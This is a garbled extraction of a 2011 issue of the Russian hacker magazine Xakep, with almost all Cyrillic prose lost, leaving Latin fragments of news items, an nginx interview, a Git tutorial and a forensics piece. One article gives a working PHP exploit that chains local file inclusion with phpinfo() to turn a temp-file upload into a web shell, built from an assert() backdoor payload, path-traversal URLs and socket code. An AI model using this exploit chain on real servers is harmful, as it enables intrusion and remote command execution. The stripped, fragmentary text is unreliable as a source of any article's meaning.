x 12 (155) 2011
IPv6,
NAT'
WWW.XAKEP.RU
: 210 .
024
NGINX
102
++11:
074
FIREFOX
155
-
PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
(xa@real.xakep.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(naumkin@glc.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
, ,
. ,
,
,
, , ,
.
, : ,
.
, . Eset , ,
. Group-IB
-.
, web- !
(),
: C
web-. ,
web- .
,
. , .
.
, !
. ,
,
.
TECHNOLOGY
(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
(birarova@glc.ru)
( )
(tatarenkova@glc.ru)
(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011
nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine
HEADER
COVERSTORY
004
020
016
017
018
MEGANEWS
,
hacker tweets
-
Proof-of-concept
024
030
036
PCZONE
042
046
050
Git&GitHub:
5
Clickjacking: , ,
IPv6:
IPv6- ?
054
060
064
068
074
078
082
Easy-Hack
!
demotivators.ru XSS
Firefox
: AdSense
X-Tools
097
102
106
110
088
094
PoC
114
120
OpenBSD 5.0 FreeBSD 9.0
kernel.org, linux.com,
linuxfoundation.org mysql.com
SYN/ACK
124
130
FERRUM
134
136
137
Content
PHP
PHP-
C++11: C++
,
UNIXOID
MALWARE
084
, !
[ engine x ]
,
phpinfo
LFI-
PHP
140
144
8.5
FAQ UNITED
FAQ
+ Bluetooth = SMS
MEGANEWS
SONY
-
15
blekko. blekko
30
.
WP7
IOS ANDROID
Sony
100
PlayStation Network,
.
Sony
Music
8500 .
, ,
Sony. Sony
(,
GeoHot ),
,
. , ,
, 7 10
PlayStation Network, Sony Entertainment Network Sony Online
Entertainment. 60
PSN/SEN 33 SOE. ,
,
- .
.
Sony, 0,1 % .
93 ,
, .
, .
, Sony , . , . :)
MICROSOFT
SECURITY ESSENTIALS
PWS:Win32/Zbot Google
Chrome.
. ,
:).
,
. ,
121 .
,
,
. 9 % .
,
iOS Android . -
,
. Apple Google , ,
,
. ,
. , Microsoft
. ,
Windows Phone 7
,
Wi-Fi
,
.
.
Microsoft ,
, .
,
, WP 7.5.
.
Facebook.
ICQ MAIL.RU
Mail.ru
. ,
.
EDIFIER
MICROSOFT -
Microsoft,
,
. ,
Waledac,
Rustock.
Microsoft Kelihos ( Hlux)
4245 .
Kelihos
- . , , DDoS-,
.
Microsoft . Microsoft ,
.
Kelihos 2011 ,
.
-, ,
.
sinkhole-
, . .
: . sinkholing
.
. Microsoft
, .
.
VeriSign.
, . ,
? , sinkholing
, -
. , ,
, , ,
.
Edifier
MP17
:
235 67 40 .
-
.
Edifier AudioCandy 2
(MP17) . . , USB- FM-,
, SD
,
( USB-). 17 .
2,4 RMS!
, . Edifier MP17
AUX.
,
FM-. 1300 . Edifier MP17
.
,
IPHONE 4S
.
, GPS .
, .
, DRM .
?
, !
Vigilant Defender.
Vigilant Defender , -
Deus Ex: Human Revolution .
, ,
. ,
, ,
.
. , , . , 24 %
, , 25 % ,
.
, ,
. , , ,
$3040 ( ,
Deus Ex: Human Revolution $60).
,
DRM .
eBay!
, ,
.
.
eBay
20. ,
(NATS). , .
,
. ,
,
.
,
.
.
NATS ,
,
. ,
.
-, .
900
. Deus
Ex: Human Revolution
.
, PAYPAL
.
, . , . PayPal
,
,
2,4 3,4 % .
.
FACEBOOK . .
RIW-2011
,
:
RIW
-.
, . ,
ESET,
. ,
,
.
, ,
Group-IB .
2011
. , , , Digital Security.
-
,
.
, CEO- Hint Solutions.
-
WikiLeaks.
. ,
Positive Technologies
, -
.
RIW-2011.
,
, RIW 2011 .
,
.
- RIW-2011,
: . !
- RIW 2011,
:
, ,
,
,
,
,
.
HEADHUNTER.RU IT-
71 %
-
, 18 %
, 8 % .
7
Buffalo's Backup Utility
Windows. ,
Time Machine,
MAC OS X.
Buffalo MiniStation
Plus
1
.
,
.
USB
,
: ,
, .
:
USB.
RAMDISK
TurboPC
TurboCopy
USB 3.0
.
USB 3.0
AES
256 .
SecureLockMobile.
RAMDISK Buffalo
. ,
,
.
.
,
.
, , , . ,
Predator Reaper,
. , , , ,
.
, .
. ,
,
. , , . ,
,
- . , ,
,
- Mafia Wars :).
, 27 100 Chrome
.
50
50 .
Belgacom
Telenet
11 ,
The Pirate Bay.
3D-
,
3D- (
) .
. ,
,
. Roland DG, ,
3D- iModela
$977 ( 3D- ). ,
, , ,
, , ,
. . ,
, , ,
.
, , ,
.
RUNA CAPITAL 3
- NGINX,
. 43
.
LibreOffice
Apple
iOS Google Android.
() LTE.
C3PO-r2d2-POE
.
. :)
Chaos
Computer Club ()
. , ,
-. , , , ,
.
. ,
, , ,
.
,
,
. , CCC, ,
.
IE 9
-
, Microsoft.
92% URL-
8% .
PHOTOSHOP
deblurring
. !
:).
1,5%
78,5%,
.
, , .
,
,
. , ? ! .
20-
.
BSL ( 82 84 ) Lineage 2.
BSL, ,
. , ,
,
.
, , , .
,
.
,
, .
,
, . ,
. -, ,
- ...
FACEBOOK .
. ACE,
Websense.
, ,
, .
SPYEYE
DART
GOOGLE
SpyEye
SMS
,
.
Trusteer ,
SpyEye . ,
:
SMS ,
- . MitB-
, -,
, . ,
- , ,
. :
SpyEye
.
,
, .
,
, . ,
, SIM-.
, ,
.
GPS- . ,
5%- .
,
Dart (dartlang.
org).
,
, -
. JavaScript. , Dart
JavaScript,
.
, , BSD. Dart
. ,
.
, Web Inspector
Dart Harmony -. ,
Dart ,
,
.
, Dart
JavaScript.
Dart
Dart. Google
Dart Chrome, ,
Google Chrome OS.
:
, .
,
.
,
.
. Dart
, , .
.
, Dart
Google. 2006 Google Web Toolkit, - Java.
, , Adwords Google Wave.
Google Web Toolkit .
Dart, Google...
Dart , , . Dart
, , Google
.
CHROME
GOOGLE
,
, Google ,
.
, , Chrome. , Chrome
Remote Desktop, -.
Windows, Mac OS Linux,
Chrome-. Chrome Remote Desktop
- Chrome.
IT-, , .
(
) .
- , .
Google , -,
, .
, Google Chrome , -.
WebRTC (Real Time
Communications),
- . Google , WebRTC
-
, . ,
. , WebRTC
Opera Mozilla. ,
Google Mozilla Opera,
.
, WebRTC. Google
, Chrome.
, WebRTC ,
: iSAC iLBC
, Google
V8. chromium.org ,
PARKER INGENUITY
,
, Google TeamViewer
P2P-
libjingle, UDP TCP
Google.
PseudoTcp libjingle,
. SSL-.
protobuf (Protocol Buffers).
. Parker
Ingenuity
Parker 5TH Technology;
,
. Parker
Ingenuity :
, .
,
,
.
HEADER
,
?
, ,
,
. .
- -,
Loggly, Splunk - .
. ,
,
syslog/syslog-ng, . ,
-,
. -. -, . -,
. , , :
- - .
standalone- Loggly, ,
Graylog (www.graylog2.org/about),
,
MongoDB . ,
Logreplica (dklab.ru/
lib/dklab_logreplica). , .
?
: Logreplica
SSH ,
. , ,
,
, ,
.
.
. :
syslog/syslog-ng?, Logreplica
. ,
.
# ,
destination = /var/log/cluster
# ( )
skip_destination_prefixes = /var/log:/var/lib/pgsql/data/logs
#
scoreboard = /var/run/dklab_logreplica.scoreboard
delay = 0.25
#
user = root
# -,
#
[files]
/var/log/{messages,maillog}
/var/log/httpd/*_log
# ,
[hosts]
first=machine1.example.com
second=nobody@machine2.example.com
. - dklab_logreplica.
init /etc/init.d . /etc/init.d/dklab_logreplica start,
logreplica .
?
, (www.denwer.ru),
PHP ( logreplica
Perl). z
?
, -
(
).
-, .
, (
ssh-keygen -t rsa) ,
(ssh-copy-id root@machine-to-be-pulled). Logreplica
(/etc/dklab_logreplica.conf),
, -,
:
Logreplica GitHub
(@asintsov)
00000000
#hacker tweets
@FishermansEnemy:
@jmj:
CISSP,
Metasploit.
Facebook,
. .
@StackSmashing:
@DidierStevens:
free(pDennisRitchie);
pDennisRitchie = NULL; // :-(
-2147483647
Integer.
.
,
,
Lisp .
@XakepRU:
: live.
xakep.ru/blog/Hack/2147.html.
:
@0x6D6172696F:
.
.
bit.ly/rIbsue.
:
,
,
Chrome,
(
Google).
cross-origin policy!
, ,
, ;).
@yandex:
:
$5000
.
, web-
. ,
.
@stamparm:
Google
'"</title><script src" urchin.js'
, (!) ASP(.
NET)/MSSQL SQLi #fact
:
-. , , SQLi. ,
:).
@0xcharlie:
,
NMFB, ,
Syscan Infiltrate. ,
= .
:
NMFB NoMoreFreeBugs
. ,
.
.
@mikko:
, ,
IE6 F-Secure? :
W32/IE6.a, ...
@samikoivu:
2008
Java. Java,
.
@ConanOBrien:
,
, .
Angry Birds, Angry
Birds Rio Angry Birds Seasons.
@VUPEN:
. ,
, .
@BreakiingNews:
75%
: 1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 - ,
...
@0xcharlie:
,
:
Secunia
.
... #nomorefreebugs
@BillGates:
, ,
.
.
HEADER
Proof-of-Concept
,
.
,
.
PoC
.
, ,
Tcpcrypt (tcpcrypt.org), TCP
.
?
. Tcpcrypt
. ,
:
.
- ,
. Tcpcrypt TCP.
, .
.
Tcpcrypt,
, ,
.
?
(github.com/
sorbo/tcpcrypt), . ,
(Windows, Mac
OS X, Linux, FreeBSD).
:
(4500 ) userland (7000 LoC).
,
netsf.inf. , , Tcpcrypt.
nix-
: ,
tcpcrypt : -
, TCP
.
.
?
79%
Tcpcrypt :). ,
.
(Internet
Draft), ,
( : bit.
ly/tyvGxs). ,
,
?
( ,
NAT), ,
. ,
Tcpcrypt
- (
VPN-). , (
36 SSL).
, .
Tcpcrypt? ,
MITM-. z
SSL 82 TCP.
tcpcrypt TCP !
!
GROUP-IB,
,
.
GROUP-IB.
Group-IB
,
. ,
.
NUX
I
L
:
:
11
20
3
:
Group-IB . .
. .
2 2011
()
,
,
.
USB Flash,
,
dd (raw).
,
,
,
,
.
11
3 20
x.
nu
Li
1.
?
,
?
2.
?
?
:
?
,
?
?
?
.
.
contest@group-ib.ru
.
DVD
!
!
COVER STORY
, , Group-IB
, !
, DDoS,
,
-
.
,
. ,
.
,
,
,
.
,
,
, ,
.
, ,
.
()
. ,
,
,
.
,
, ,
. .
1)
, . , ,
. ,
, ,
.
2)
,
,
.
.
3)
. , DLP
. DLP-
.
.
4)
,
-. ,
.
.
,
, ,
.
1) , , , :
,
.
.
.
, ,
( , IPS,
DLP), ,
IP- 8.8.8.8,
,
1 25 2011
.
2241 19
2000 .
() . .
Caine - Computer Aided INvestigative Environment
.
-,
.
,
.
.
2) , , ,
:
, ,
, ,
,
.
,
.
,
.
.
Linux:
Caine (http://www.caine-live.net/),
RipLinux (http://rip.7bf.de/current/).
, CD\DVD
USB-, .
livecd ,
.
.
- , ,
. ( )
DC3DD. (
)
Access Data FTK Imager (http://
accessdata.com/support/adownloads),
. ,
,
.
-
( , ) ,
.
,
.
,
.
,
,
,
.
,
.
. ,
.
,
,
. ,
, :
, ;
,
;
(, );
, .
:
,
. .,
12345.
(), DVD, USB-,
SDHC.
Seagate, 3750330NS,
AAABBB123.
\Users\\Documents\ 1 8
.txt.
QIP 2010,
6221, ,
.
, :
(, , );
(, );
;
,
.
, , Group-IB
,
:
\COMP1\HDD1\IE USB-, ADATA, 1234.
, :
;
, -,
- . ;
, ,
.
!
:
.doc,
653 .
MicroSDHC,
Transcend, 16 ,
1234 567.
-
Internet Explorer .
,
.
(, -),
, , ,
,
.
,
:
, DLP
, .
DLP, ,
.
.
.
, , .
,
,
,
.
RIP Linux
: DDOS
,
:
, -
- .
-.
- ,
.
-
(), ,
.
,
510
.
.
,
.
.
. ,
, .
,
, ,
:),
.
,
:
1)
.
2)
.
3) ,
. z
SONY , ,
:
,
:
,
,
, , ( ).
.
.
( ),
, .
,
,
,
.
COVER
STORY
[engine x
nginx
, ,
,
?
. ,
( ) -,
18 . 1987
,
,
-,
.
-226,
- .
, -86,
,
.
:
, Yamaha
( MSX). , , I.
, - .
NGINX
,
?
AV,
19891990 .
,
- 100 .
,
,
: ,
, ,
. ,
.
,
. :
,
. -
, 1992-
, .
1994 ,
,
.
7 ,
2000 .
NASDAQ, -,
. -
XXL.RU, ,
,
13 2000
.
.
1994
, .
,
200 0
, .
11
2002
nginx,
web-
. 45
.
2011 $3.000.000
Nginx , inc. .
Q
.
. ,
,
, ,
,
Apache. , mod_gzip
,
mod_deflate, Apache 1.3.
mod_proxy. ,
,
- .
mod_accel
Apache .
2001 .
,
?
, . Mod_deflate
,
, .
, , ,
. 2001
-, Apache.
,
, .
, , ,
, , .
Apache , .
:
Apache
, .
nginx Apache
. , ,
nginx .
Apache: ,
,
. ,
- ,
.
- , , :
, ?
nginx . ,
- 2002 nginx.
? ?
2003
, , , nginx
.
Rate.ee,
. , ,
. nginx
mamba.ru zvuki.ru,
MP3.
2004
foto.rambler.ru, , , nginx
,
.
, , ,
, , . ,
, . - 2004
, foto.rambler.ru
nginx.
4 2004 ,
, : 0.1.0.
NGINX
,
?
.
. nginx
. nginx
,
.
, , nginx,
, , .
,
.
.
,
, ,
?
. ,
.
, nginx
,
,
, . nginx, ,
. -,
,
, -,
.
, LIGHTTPD
, .
-,
nginx
. nginx
. ,
nginx
nginx. , nginx
-.
lighttpd (lighty). -
, nginx, .
(Jan Kneschke).
,
, , .
, ,
.
, lighttpd
FastCGI. 20002001
, , Apache: PHP, Perl, Python.
lighttpd
PHP- , FastCGI.
lighttpd FastCGI . 2000 :
, FastCGI?
mod_php, .
NGINX ?
. nginx
-
- HTTP FastCGI
WSGI.
Apache , nginx
,
FastCGI.
, ,
nginx, Apache.
:
nginx , .
,
?
, ,
Apache nginx? ,
, . Apache
,
- , ,
mod_php. ,
PHP 100
, ,
, 100 .
: 10
,
, -
.
100
, , 80 / (10 /).
, 10
. ,
nginx
, Apache PHP
1020 .
, , Apache
, ,
.
,
. nginx
Apache, :
nginx
, Apache,
,
.
nginx ,
- ,
,
(
Apache,
. . .).
- , ,
nginx
nginx
,
.
,
,
, - .
Apache, nginx
! .
, ,
, .
, -,
,
. , nginx
.
, , ,
. ?
, , :
- Apache . ,
nginx, Apache.
FastCGI PHP WSGI Python.
, WordPress.com nginx
, -
LiteSpeed.
nginx,
PHP FastCGI.
nginx ,
, MP3, FLV-, MPEG4-, .
.
NGINX -
?
, ,
, .
,
.
, ?
- ,
. ,
. ,
, ,
. ,
- Debian/Ubuntu,
,
, ,
. ?
, , .
ASLR?
, . .
, . , ,
, ,
, , .
nginx ,
, , .
, ,
. ,
, nginx ,
malloc.
, -
,
. nginx . ,
, . , ,
, .
Security-advisory ,
. ,
, . ,
, ,
? ,
- .
Q
, ?
, .
.
.
. :
, .
. .
,
. :
, -
,
, . , ,
,
. ,
, . :
nginx , ,
,
. ,
.
,
NGINX,
INC. ,
.
. , ,
2008-
, , .
,
. -
nginx, . ,
.
, -
,
,
. ,
,
nginx. ,
: ,
,
.
- . ,
, - ,
.
, Parallels Runa
Capital.
, .
, ?
,
, .
,
, ,
, .
, , ,
, , -,
,
, ,
- , . ,
, :
-, -. . ,
, .
:
NGINX.
?
.
?
, . ,
, ,
.
,
,
.
, : .
, ,
BSD,
.
nginx ,
.
, nginx
, Rate.ee zvuki.ru.
NGINX?
A ,
. , .
,
, ,
, .
.
Linux-:
CentOS, Ubuntu.
, , .
: ,
, ,
.
.
.
,
,
.
,
, ,
, ,
. ,
.
,
, :).
,
,
, ?
, ,
, ,
, ,
: .
, ,
.
,
! , -
:
-
.
, , .
- ,
.
-, :
, , .
! ,
- -?
?
nginx
.
-, , ,
,
-, ,
-
. , nginx
, ,
.
, : , ,
. ,
.
opensource-,
,
- , - ,
, .
, opensource. ,
, . ,
,
.
,
.
,
. ,
opensource-
.
, , ,
, ,
,
nginx.
. ,
- : ,
! - -.
?
,
,
. . .
,
. , , ,
-
, - ,
.
, : ,
. ,
open source, ,
/ . sponsored development.
,
nginx: ,
, , , , CDN-.
.
, ,
, ?
, ,
.
,
, ,
.
, .
,
,
, .
,
,
, ,
?
, ,
, ,
,
- . ,
,
- .
,
. . z
nginx
- nginx,
. , ,
, -, .
nginx.
Nginx
.
HTTP keep-alive
.
-
(Netcraft, 2011):
-
nginx
100
000 000
80 000
000
43 000
000
-0.38%
,
nginx
-.
-0.07%
+0.51%
2002
2004
2011
1.0
nginx
2011 nginx
:
.
Rate.ee
,
nginx.
nginx
:
$3
nginx
87 912
.
70+
.
nginx hiring!
8
nginx
security advisories.
3
nginx
R_T_T
,
.
,
. ,
,
,
.
,
Intel
( 2007 )
,
SMP-.
,
, ,
1. AMD
,
.
,
, .
,
. , ,
,
, .
, ,
.
,
.
.
( 4060 ),
- , ,
.
,
,
( , Intel
). .
, ,
, .
, , -
, .
,
,
.
,
,
.
,
, .
,
.
, ,
- .
,
, , .
,
Intel
.
-
86.
,
,
.
.
, - , , - .
,
,
- .
,
.
,
, ( )
.
, , ,
.
, ,
,
Intel
,
:
, , -
,
,
Intel. , -
? : Assembled
Canada, Assembled China.
, -
2. Intel
,
,
. , ,
, ,
.
:
, .
,
, , ,
, .
, Intel
. ,
5000, . ,
631xESB/632xESB I/O Controller Hub,
- , 2007
. ,
. ,
-:
,
,
.
()
.
, - ,
.
, , , -
, , ,
, : , .
Intel ,
,
( IPMI,
)
,
.
, - ,
, .
.
,
:
ARC4 processor working at 62.5 MHz speed.
Interface to both LAN ports of Intel
631xESB/632xESB I/O Controller Hub allowing
direct connection to the net and access to all LAN
registers.
Cryptographic module, supporting AES and
RC4 encryption algorithms and SHA1 and MD5
authentication algorithms.
Secured mechanism for loadable Regulated FW.
40
, ! Intel
256 .
,
,
.
,
Intel, 5000,
. , , ,
(
,
).
,
, -
,
,
.
, ,
-
, .
,
.
, Intel
,
.
.
:
Intel
5000 , - ,
.
-
Intel ,
,
.
- ,
-
, , , , ,
.
-
Intel,
, . ,
.
, ,
, ,
.
,
?
,
. ,
,
60 , .
, , ,
, . , ,
,
- IP-.
? , -
,
, -
.3
.
, ,
, ,
,
.
.
Intel AMD ,
, ,
. ,
, .
.
,
,
.
,
.
VMCB (VMCS), ,
0,40,7 .
Intel ,
,
.
.
Intel AMD
.
. AMD , .
AMD
VMRUN ( , ).
VMCB- AMD
,
VMRUN VMCB- .
,
AMD .
Intel
. VMCB- VMREAD VMLOAD,
.
,
VMCB-,
.
, , .
,
,
. , ,
. Intel
, , ,
VMCB (. 2).
,
SMM- ( ),
, , VMB-,
,
,
,
.
, Intel, ,
, ,
. ,
,
.
: , -
.
,
. .
,
. , -
.
,
,
. , : ,
.
,
.
, Intel
.
,
, 7,
11- ,
( - ). , 11
, VMCB-
.
,
.
11-
,
,
, .
, ,
-
.
, , , 11-
.
,
!
, -
,
,
.
, . , ,
,
-
.
- , ,
.
,
.
, ,
Intel, , ,
, .
- .
, . , ,
.
-,
.
, .
. ,
, , .
,
.
USB-, ,
,
.
(. 3).
, ,
,
.
(. . 4).
- ,
Intel, ,
.
. Intel. ,
.
,
, .
.
. , ,
Intel , .
, ,
.
, ,
.
. 4.
.
,
.
, .
, , ,
,
. ,
,
,
.
,
, ,
.
, ,
. ,
. .
,
, .
, ,
, ,
,
.
, , ,
,
.
,
,
. ,
,
.
,
. ,
,
.
, , ,
, ,
.
,
-
, ,
-?
,
?
,
, .
, .
,
( , ). ,
,
, ,
. 86, , ,
. , ,
, .
, ,
.
.
,
:
. - ,
.
-, -,
,
.
,
. ,
,
.
-
,
. ,
,
, , ,
,
, .
, ,
.
, : /
.
/
.
!
20
.
:
.
DOC-
.
,
,
.
,
( ,
) .
. ,
,
,
.
,
.
.
.
,
, .
, ,
. , ,
, .
,
, , .
, ,
.
, ,
, -
. ?
. ,
. ,
, , ,
, .
,
.
,
.
, , ,
. ,
, -. , , , , ,
.
, . ,
, , , ,
, . z
phpinfo
LFI-
PHP
LFI
phpinfo()
.
.
WWW
php.net
PHP;
bit.ly/neygaA
LFI;
bit.ly/ccFHcY
phpinfo() ;
bit.ly/pmkMVP
LFI phpinfo()
RDot;
bit.ly/YP9LE
BWMeter;
bit.ly/eS4GxW
Procmon.
WARNING
. ,
,
INFO
DVD
phpinfo()
10% .
PERL PHP,
.
, ,
local file include, ,
. . , .
,
, . LFI,
.
. -: , - local file inclusion...
php.ini - , ?
, - , ! LFI- ,
,
.
LFI:
1. (, , . .).
(,
).
2. (/apache/logs/error.log, /var/log/access_log, /proc/
self/environ, /proc/self/cmdline, /proc/self/fd/X ).
, ,
. PHP CGI
/proc, .
3. (data:, php://input, php://filter),
allow_url_include=On ( Off) PHP >= 5.2.
4. (/tmp/sess_*, /var/lib/php/session/). ,
.
5. . CMS www-,
( , /var/spool/
mail).
phpinfo
tmp-
, LFI
(/tmp/php*, C:\tmp\php*). /
:
LFI-;
phpinfo();
- Windows (
);
PHP > 5.2.0.
( , - ,
):
1. PHP- php- phpinfo(), PHP (tmp) .
2. phpinfo()
seed ( ) .
3.
(, Content-Length),
.
4. tmp- LFI.
PHP- tmp-
PHPINFO()
phpinfo().
, php.ini
, .
:
1. upload_tmp_dir , PHP . (NULL),
Environment.TEMP.
2. file_uploads
upload_tmp_dir (
On).
3. upload_max_filesize .
(
10 ), 2 .
4. max_execution_time .
0, ,
, . :-)
5. session.serialize_handler . php
( ).
, phpinfo()
PHP, PHP Version 5.3.8.
PHP $_FILES
. . , :
(
RFC1867):
1. .
2. - PHP.
3. PHP tmp- .
4. .
6. PHP- .
7. PHP -.
8. PHP cleanup ( ) .
9. - , .
http://site.com/css.php?file=style.css
http://site.com/css.php?file=../../(..)/etc/passwd
, css.php:
<?php
// {..} - ,
// {..}
if (!isset($_GET['file']) OR
!file_exists('./tpl/default/'.$_GET['file']))
die('404 Not Found');
// {..} , -
//
include './tpl/default/'.$_GET['file'];
?>
, ,
,
. *nix Windows:
http://site.com/css.php?file=../../../../../etc/passwd
http://site.com/css.php?file=../../../../../tmp/
http://site.com/css.php?file=../../../../..\Windows\Temp\
3, 4, 5, 6, 7 tmp- ,
8 . PHP-
$_FILES,
move_uploaded_file(). ,
PHP
, ,
. , PHP
, cleanup.
, ,
, ,
. ,
PHP- ( ob_* ob_start, ob_flush ), , 8 9,
.
DOS LFI + PHPINFO()
_FILES, ,
. .
, - ?
? .
. ,
30
, ,
. ,
.
(
+ ).
. ,
. .
DoS-
file_upload php.ini.
,
. phpinfo(),
tmp- , ,
LFI , PHP cleanup.
, , .
, PHP ?
PHP
,
LFI , PHP. PHP
! , . , . , , .
, . :) :
Content-Length (
);
(,
------------8WvJNM).
, :
1. .
2. ( ).
3. ,
.
2 ,
PHP . , , ,
, ,
.
TMP-
,
.
phpinfo() .
(phpinfo.php, info.php, i.php . .), Grey eLwaux
( ). ,
. . PHP Variables phpinfo()
PHPINFO()
PHP- phpinfo()
, .
,
.
, ,
phpinfo():
1. , / PHP, ;
2. document_root ,
;
3. error_log ( LFI);
4. safe_mode (default OFF) ;
5. open_basedir (default empty) ,
PHP;
6. allow_url_fopen (default ON) URL
;
7. allow_url_include (default OFF) ;
8. magic_quotes_gpc (default OFF)
;
9. register_globals (default OFF) ;
10. disable_functions (default empty)
;
11. max_execution_time (default 0)
;
12. display_errors (default OFF) ;
13. upload_tmp_dir tmp-.
14. (curl, sockets, zip . .);
15. : _GET, _POST, _COOKIE,
_FILES, _SERVER.
GET- : http://site.com/
phpinfo.php?a[]=111. PHP _FILES _GET ( ,
var_dump). , ,
tmp-. tmp-
upload_tmp_dir php.ini. *nix /tmp, C:\Windows\Temp. 99 % PHP
. (bit.ly/
raWpwS), Windows , PHP
GetTempFileName,
:
phpinfo
(!) .
<path>\<pre><uuuu>.TMP
--<path> = C:\Windows\Temp ( upload_tmp_dir
php.ini),
<pre> = php (session.serialize_handler),
<uuuu> = .
, Windows <uuuu>
, :
php1A3E.tmp
php1A3F.tmp
php1A40.tmp
*nix
mkstemp (linux.die.net/man/3/mkstemp):
<path>/<pre><rand>
<path> = /tmp,
<pre> = php (session.serialize_handler),
<rand> = (seed += XXX ^ PID)
XXX glibc
:
- XXX = time()
- XXX = gettimeofday().sec << 32 | gettimeofday().usec
- XXX = rdtsc
, ,
: /tmp/phpXXXXXX, XXXXXX
[A-Za-z0-9]:
/tmp/php6Dekf9
/tmp/phpK1uuk5
/tmp/phpdnJ82P
, *nix Windows
. , -
WINDOWS
,
:
1. phpinfo().
2. , phpinfo()
_FILES[tmp_name] .
3. phpinfo()
<?php
assert(stripslashes($_REQUEST["e"]));
?>
, Content-Length
. .
4. ,
, (. 1) (
LFI).
5. tmp-, .
6. 2- , .
, phpinfo() win-
. phpinfo() ,
. Windows 61440 .
*nix- :
1. phpinfo() HTTP- c PHP-
.
2. -
- (, BWMeter),
.
3. , phpinfo().
4. ! [tmp_name] - ( ,
), /
.
phpinfo() - ,
,
.
phpinfo.php
, ,
,
:
http://site.com/css.php?file=../../htdocs/public_html/
phpinfo.php
PHP,
, . ,
, , PHP-.
, phpinfo() ,
.
1000000*36 ,
.
. ,
Microsoft-IIS/7.5 PHP/5.3.8.
Windows- css.php LFI:
<?php
$file = './uploads/'.$_GET['f'];
if ( file_exists($file) ) {include $file; die; }
die('File not found!');
?>
phpinfo.php:
<?php
phpinfo();
?>
, tmp-:
<?php
assert(stripslashes($_REQUEST["e"]));
?>
PHP- POST-
PHP-:
// Evil
$file="-----------------------------XaXbXaXbXaXbXa\r\n";
$file.="Content-Disposition: form-data; name=file".rand(0,100).";
filename=\r\nfile".rand(0,100).".txt\r\n";
$file.="Content-Type: text/plain\r\n\r\n";
$file.="<?php assert(stripslashes(\$_REQUEST[\"e\"]));?>\r\n";
$file.="-----------------------------XaXbXaXbXaXbXa\r\n";
$post = $file;
$req ="POST ".$target." HTTP/1.0\r\n";
$req.="Host: ".$host."\r\n";
$req.="Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n";
$req.="Content-Length: ".strlen($post)."\r\n";
$req.="Connection: Close\r\n\r\n";
$req.= $post;
:
$tmp = '';
$html = '';
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, 80);
socket_write($sock, $req);
while ($out = socket_read($sock, 65536))
{
$html .= $out;
if(preg_match_all('#=>(.*)#',$html,$r) &&
!empty($r[0][2]))
{
$tmp_hex seed .
. . ContentLength ( , ):
$req = substr($req,0,strlen($req)-2);
retname($host,$req);
.
, .
$tmp_hex +1 LFI. ? ,
. , PHP, ,
-
, .
. +2,
+3 . . , , , tmp-,
1 100.
LFI . -:
http://site.com/css.php?file=../../../tmp/
php7xEkH3&e=system('dir')
:
php expl.php step4 ../../../tmp/php7xEkH3.tmp
http://site.com/s.txt
here your shell: http://site.com/8149.php
expl.php , .
,
phpinfo() . , PHP Live,
magic_quotes=on ./super . Windows-
, nix*- BWMeter
. , - PHP
-
. , . z
Preview
32 .
.
PC ZONE
50
IPV6: HOWTO
IPv4 .
.
IPv6! ,
.
IP .
:
, .
.
/ ?
NAT IPv4.
IPv6,
,
.
PC ZONE
46
- , ? clickjacking.
68
:
.
.
102
,
, -
C++11
C++.
MALWARE
88
,
, , ,
, HIPS.
UNIXOID
106
Google
,
. .
120
kernel.org,linux.com,
linuxfoundation.org mysql.com.
?
PC ZONE
Git&GitHub:
5
,
version1, version2, version2a,
.
,
.
, hello
world,
.
15 ,
,
Git!
GIT?
Git ,
, Linux.
: , .
Git'
. : Git ,
.
, , , -
.
, , , ,
, ,
IDE.
. .
Git
, , , .
Linux git
. Mac', ,
git-osx-installer. Windows
,
( ).
Git
Windows, , , .
Git .
GitGUI, Git, IDE git, , ,
.
Git .
commit. . commit , ( ).
:
git config --global user.name "Your Name"
git config --global user.email "your@email.com"
, :
git config --global color.diff auto
git config --global color.status auto
git config --global color.branch auto
Git&GitHub:
commit
git config, ,
.
. .
, ,
(, , ,
).
git init
git, init.
Git- (
.git). , - . . ,
Git Bash (master). ,
. ?
. . () ,
. ( - ), , .
.
git add
commit.
Commit
, . ,
, commit, staging area.
. ,
, .
, staging area:
git add .
. .
:
git add *.js
git add index.php
git commit
commit , , ( ):
git commit
staging area
. commit
jQuery GitHub
, , ,
, . Git Vim (-,
). , <i> (
), , Initial
Commit. , , <ESC> :wq, . !
Git , commit
. -, -m
commit:
git commit -m "initial commit"
-a staging area
commit .
Git staging area
. -m -a
:
git commit -am 'update to index.php'
git status
git status
. .
commit, git status , .
, , . , ,
git add, - ,
changes to be
committed.
git branch / git checkout
, .
: , ,
. , ,
. Git ,
. branch,
, ,
.
git branch
branch,
. master
branch , .
,
branch, :
experimentalBrunch
.
, Git
( - master-). checkout,
:
git log
, ,
.
(git log --graph) GUI-:
gitk --all
git add .
git commit -m 'New architecture introduced'
,
. .
, , , :
git checkout master
: master- , , ,
.
git merge
. ,
master-.
git merge. , master branch,
:
.
, ,
.
GITHUB:
, , Git ,
,
. Git ,
.
,
Git. , ,
GitHub (www.github.com).
, , ,
.
, GitHub, , .
, Git . ,
Git&GitHub:
, . open source ,
Sign Up . ,
SSH-. ,
-, ( PuTTY)
GitHub-. Public Keys Add another public key.
.
SSH , .
,
, . ,
.
